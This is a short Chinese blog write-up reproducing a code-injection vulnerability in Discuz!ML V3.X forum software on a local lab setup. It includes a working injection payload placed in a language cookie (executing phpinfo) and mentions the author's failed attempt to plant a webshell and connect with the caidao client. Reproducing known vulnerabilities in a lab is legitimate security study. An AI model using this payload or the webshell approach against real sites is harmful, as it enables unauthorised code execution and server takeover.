Discuz!ML V3.X 代码注入漏洞复现
0x01 环境搭建
源码下载地址:https://bitbucket.org/vot/discuz.ml/get/tip.zip(需翻墙) |
集成环境:phpstudy
搭建成功截图
0x02 漏洞复现
使用burp抓包
漏洞存在此页面
http://192.168.1.51/dz3.4/upload/portal.php |
payload:Tt13_2132_language=es '.phpinfo().'; |
payload |
0x03 总结
本来想根据里面的漏洞审计下代码,看看漏洞是怎么形成的,无奈技术太菜,只能放弃,exp是经过两次编码得到的,第一次是对一句话进行编码,第二次是所有的字符进行编码,但是一句话编码这里出了点问题,GET单词没有被编码,导致木马写不进去,所以还是用的大佬写的exp。也尝试了写一个webshell用caidao连接,估计也是我刚刚说的那个问题,没有成功,遇到的坑大概就是这些。。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Time'Blog!
评论